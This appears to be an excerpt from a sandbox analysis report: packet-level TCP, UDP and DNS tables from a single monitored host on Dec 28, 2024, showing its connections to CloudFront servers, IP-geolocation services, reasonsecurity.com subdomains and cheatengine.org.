Dec 28, 2024 22:21:53.125672102 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.125713110 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.125725031 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.125749111 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.130660057 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.130676031 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.130747080 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.130754948 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.131710052 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.135166883 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.135205984 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.135240078 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.135246038 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.135270119 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.135294914 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.140316010 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.140335083 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.140417099 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.140424967 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.140471935 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.145281076 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.145298004 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.145366907 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.145374060 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.147717953 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.147722960 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.157849073 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.157869101 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.157911062 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.157918930 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.157957077 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.186458111 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.186475039 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.186652899 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.186652899 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.186671019 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.279800892 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.313637972 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.313652039 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.313699007 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.313713074 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.313744068 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.313751936 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.313807011 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.317797899 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.317807913 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.317835093 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.317866087 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.317876101 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.317884922 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.317951918 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.317951918 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.322927952 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.322946072 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.323014975 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.323030949 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.325927019 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.328587055 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.328603983 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.328681946 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.328692913 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.330190897 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.332951069 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.332967043 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.333033085 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.333040953 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.333868980 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.337838888 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.337855101 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.337914944 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.337923050 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.341892004 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.349731922 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.349750996 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.349811077 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.349818945 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.351511002 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.380239010 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.380258083 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.380326986 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.380338907 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.381644964 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.505559921 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.505589008 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.505671024 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.505687952 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.505728006 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.509743929 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.509762049 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.509830952 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.509840965 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.509886980 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.514818907 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.514834881 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.514902115 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.514911890 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.514954090 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.519845963 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.519860983 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.519928932 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.519939899 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.519984007 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.525141001 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.525155067 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.525228977 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.525250912 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.525295973 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.529454947 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.529469013 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.529531956 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.529541969 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.529586077 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.541816950 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.541831017 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.541898966 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.541906118 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.541944027 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.572153091 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.572173119 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.572238922 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.572247028 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.572289944 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.697422028 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.697443962 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.697623014 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.697635889 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.697689056 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.702122927 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.702137947 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.702219963 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.702229977 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.702271938 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.706835985 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.706849098 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.706924915 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.706933022 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.706980944 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.711704016 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.711723089 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.711786985 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.711795092 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.711842060 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.716712952 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.716727018 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.716794968 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.716800928 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.716845989 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.721415043 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.721429110 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.721496105 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.721503019 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.721544027 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.733881950 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.733896017 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.733962059 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.733969927 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.734011889 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.764589071 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.764619112 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.764884949 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.764920950 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.765059948 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.889517069 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.889543056 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.889607906 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.889626026 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.889667034 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.889689922 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.893712997 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.893753052 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.893786907 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.893790960 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.893831015 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.898087978 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.898104906 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.898175001 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.898183107 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.903036118 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.903055906 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.903112888 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.903120041 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.903162003 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.908181906 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.908195972 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.908260107 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.908267021 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.908339024 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.908380032 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.908385992 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.913374901 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.913405895 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.913434029 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.913440943 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.913467884 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.925838947 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.925853014 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.925915003 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.925923109 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.926079035 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.956304073 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.956321001 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.956378937 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:53.956387997 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:53.956432104 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:54.081378937 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:54.081438065 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:54.081469059 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:54.081475973 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:54.081521988 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:54.085644007 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:54.085678101 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:54.085706949 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:54.085711002 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:54.085733891 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:54.085760117 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:54.086324930 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:54.090810061 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:54.090822935 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:54.090843916 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:54.090873957 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:54.090888023 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:54.090904951 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:54.092959881 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:54.093020916 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:54.093027115 CET	443	49920	18.66.161.123	192.168.2.5
Dec 28, 2024 22:21:54.093071938 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:55.178029060 CET	49920	443	192.168.2.5	18.66.161.123
Dec 28, 2024 22:21:56.833913088 CET	49943	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:56.833981037 CET	443	49943	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:56.834078074 CET	49943	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:56.834491014 CET	49943	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:56.834500074 CET	443	49943	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:58.545058012 CET	443	49943	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:58.545128107 CET	49943	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:58.546804905 CET	49943	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:58.546814919 CET	443	49943	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:58.547045946 CET	443	49943	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:58.548435926 CET	49943	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:58.548468113 CET	49943	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:58.548475027 CET	443	49943	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:59.515634060 CET	443	49943	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:59.515724897 CET	443	49943	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:59.515794039 CET	49943	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:59.516096115 CET	49943	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:59.516113043 CET	443	49943	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:59.516144991 CET	49943	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:59.516151905 CET	443	49943	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:59.517831087 CET	49951	443	192.168.2.5	3.165.135.3
Dec 28, 2024 22:21:59.517867088 CET	443	49951	3.165.135.3	192.168.2.5
Dec 28, 2024 22:21:59.517945051 CET	49951	443	192.168.2.5	3.165.135.3
Dec 28, 2024 22:21:59.519707918 CET	49951	443	192.168.2.5	3.165.135.3
Dec 28, 2024 22:21:59.519721031 CET	443	49951	3.165.135.3	192.168.2.5
Dec 28, 2024 22:22:01.134315014 CET	443	49951	3.165.135.3	192.168.2.5
Dec 28, 2024 22:22:01.134397984 CET	49951	443	192.168.2.5	3.165.135.3
Dec 28, 2024 22:22:01.173023939 CET	49951	443	192.168.2.5	3.165.135.3
Dec 28, 2024 22:22:01.173039913 CET	443	49951	3.165.135.3	192.168.2.5
Dec 28, 2024 22:22:01.173656940 CET	443	49951	3.165.135.3	192.168.2.5
Dec 28, 2024 22:22:01.179471016 CET	49951	443	192.168.2.5	3.165.135.3
Dec 28, 2024 22:22:01.179506063 CET	49951	443	192.168.2.5	3.165.135.3
Dec 28, 2024 22:22:01.179510117 CET	443	49951	3.165.135.3	192.168.2.5
Dec 28, 2024 22:22:02.011100054 CET	443	49951	3.165.135.3	192.168.2.5
Dec 28, 2024 22:22:02.011260033 CET	443	49951	3.165.135.3	192.168.2.5
Dec 28, 2024 22:22:02.011338949 CET	49951	443	192.168.2.5	3.165.135.3
Dec 28, 2024 22:22:02.011338949 CET	49951	443	192.168.2.5	3.165.135.3
Dec 28, 2024 22:22:02.011359930 CET	49951	443	192.168.2.5	3.165.135.3
Dec 28, 2024 22:22:02.011373043 CET	443	49951	3.165.135.3	192.168.2.5
Dec 28, 2024 22:22:14.892891884 CET	49994	80	192.168.2.5	208.95.112.1
Dec 28, 2024 22:22:15.012350082 CET	80	49994	208.95.112.1	192.168.2.5
Dec 28, 2024 22:22:15.012439013 CET	49994	80	192.168.2.5	208.95.112.1
Dec 28, 2024 22:22:15.013387918 CET	49994	80	192.168.2.5	208.95.112.1
Dec 28, 2024 22:22:15.132826090 CET	80	49994	208.95.112.1	192.168.2.5
Dec 28, 2024 22:22:16.156825066 CET	80	49994	208.95.112.1	192.168.2.5
Dec 28, 2024 22:22:16.361668110 CET	49994	80	192.168.2.5	208.95.112.1

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 28, 2024 22:20:03.053884029 CET	65145	53	192.168.2.5	1.1.1.1
Dec 28, 2024 22:20:03.292402983 CET	53	65145	1.1.1.1	192.168.2.5
Dec 28, 2024 22:20:05.150749922 CET	56313	53	192.168.2.5	1.1.1.1
Dec 28, 2024 22:20:05.291902065 CET	53	56313	1.1.1.1	192.168.2.5
Dec 28, 2024 22:20:07.448301077 CET	61192	53	192.168.2.5	1.1.1.1
Dec 28, 2024 22:20:08.079087019 CET	53	61192	1.1.1.1	192.168.2.5
Dec 28, 2024 22:20:09.165087938 CET	55065	53	192.168.2.5	1.1.1.1
Dec 28, 2024 22:20:09.303551912 CET	53	55065	1.1.1.1	192.168.2.5
Dec 28, 2024 22:20:11.447704077 CET	55504	53	192.168.2.5	1.1.1.1
Dec 28, 2024 22:20:11.753463030 CET	53	55504	1.1.1.1	192.168.2.5
Dec 28, 2024 22:21:12.291006088 CET	56496	53	192.168.2.5	1.1.1.1
Dec 28, 2024 22:21:12.500791073 CET	53	56496	1.1.1.1	192.168.2.5
Dec 28, 2024 22:21:29.032388926 CET	62198	53	192.168.2.5	1.1.1.1
Dec 28, 2024 22:21:29.320075989 CET	53	62198	1.1.1.1	192.168.2.5
Dec 28, 2024 22:21:37.580051899 CET	49310	53	192.168.2.5	1.1.1.1
Dec 28, 2024 22:21:37.819847107 CET	53	49310	1.1.1.1	192.168.2.5
Dec 28, 2024 22:22:06.184484959 CET	53451	53	192.168.2.5	1.1.1.1
Dec 28, 2024 22:22:06.561644077 CET	53	53451	1.1.1.1	192.168.2.5
Dec 28, 2024 22:22:14.735938072 CET	60392	53	192.168.2.5	1.1.1.1
Dec 28, 2024 22:22:14.873739958 CET	53	60392	1.1.1.1	192.168.2.5
Dec 28, 2024 22:22:16.379668951 CET	52969	53	192.168.2.5	1.1.1.1
Dec 28, 2024 22:22:16.822206974 CET	53	52969	1.1.1.1	192.168.2.5
Dec 28, 2024 22:22:23.751873970 CET	52158	53	192.168.2.5	1.1.1.1
Dec 28, 2024 22:22:23.891159058 CET	53	52158	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 28, 2024 22:20:03.053884029 CET	192.168.2.5	1.1.1.1	0xe300	Standard query (0)	freegeoip.app	A (IP address)	IN (0x0001)	false
Dec 28, 2024 22:20:05.150749922 CET	192.168.2.5	1.1.1.1	0x9a1e	Standard query (0)	ipbase.com	A (IP address)	IN (0x0001)	false
Dec 28, 2024 22:20:07.448301077 CET	192.168.2.5	1.1.1.1	0x8100	Standard query (0)	d34hwk9wxgk5fi.cloudfront.net	A (IP address)	IN (0x0001)	false
Dec 28, 2024 22:20:09.165087938 CET	192.168.2.5	1.1.1.1	0xf9c5	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Dec 28, 2024 22:20:11.447704077 CET	192.168.2.5	1.1.1.1	0xa482	Standard query (0)	d31tu1fsc224h4.cloudfront.net	A (IP address)	IN (0x0001)	false
Dec 28, 2024 22:21:12.291006088 CET	192.168.2.5	1.1.1.1	0x94f6	Standard query (0)	d34hwk9wxgk5fi.cloudfront.net	A (IP address)	IN (0x0001)	false
Dec 28, 2024 22:21:29.032388926 CET	192.168.2.5	1.1.1.1	0x4f5	Standard query (0)	shield.reasonsecurity.com	A (IP address)	IN (0x0001)	false
Dec 28, 2024 22:21:37.580051899 CET	192.168.2.5	1.1.1.1	0x77f5	Standard query (0)	d31tu1fsc224h4.cloudfront.net	A (IP address)	IN (0x0001)	false
Dec 28, 2024 22:22:06.184484959 CET	192.168.2.5	1.1.1.1	0x777c	Standard query (0)	electron-shell.reasonsecurity.com	A (IP address)	IN (0x0001)	false
Dec 28, 2024 22:22:14.735938072 CET	192.168.2.5	1.1.1.1	0x7394	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Dec 28, 2024 22:22:16.379668951 CET	192.168.2.5	1.1.1.1	0x50a9	Standard query (0)	api.openweathermap.org	A (IP address)	IN (0x0001)	false
Dec 28, 2024 22:22:23.751873970 CET	192.168.2.5	1.1.1.1	0x410a	Standard query (0)	cheatengine.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 28, 2024 22:20:03.292402983 CET	1.1.1.1	192.168.2.5	0xe300	No error (0)	freegeoip.app		172.67.160.84	A (IP address)	IN (0x0001)	false
Dec 28, 2024 22:20:03.292402983 CET	1.1.1.1	192.168.2.5	0xe300	No error (0)	freegeoip.app		104.21.73.97	A (IP address)	IN (0x0001)	false
Dec 28, 2024 22:20:05.291902065 CET	1.1.1.1	192.168.2.5	0x9a1e	No error (0)	ipbase.com		104.21.85.189	A (IP address)	IN (0x0001)	false
Dec 28, 2024 22:20:05.291902065 CET	1.1.1.1	192.168.2.5	0x9a1e	No error (0)	ipbase.com		172.67.209.71	A (IP address)	IN (0x0001)	false
Dec 28, 2024 22:20:08.079087019 CET	1.1.1.1	192.168.2.5	0x8100	No error (0)	d34hwk9wxgk5fi.cloudfront.net		65.9.108.148	A (IP address)	IN (0x0001)	false
Dec 28, 2024 22:20:08.079087019 CET	1.1.1.1	192.168.2.5	0x8100	No error (0)	d34hwk9wxgk5fi.cloudfront.net		65.9.108.5	A (IP address)	IN (0x0001)	false
Dec 28, 2024 22:20:08.079087019 CET	1.1.1.1	192.168.2.5	0x8100	No error (0)	d34hwk9wxgk5fi.cloudfront.net		65.9.108.93	A (IP address)	IN (0x0001)	false
Dec 28, 2024 22:20:08.079087019 CET	1.1.1.1	192.168.2.5	0x8100	No error (0)	d34hwk9wxgk5fi.cloudfront.net		65.9.108.87	A (IP address)	IN (0x0001)	false
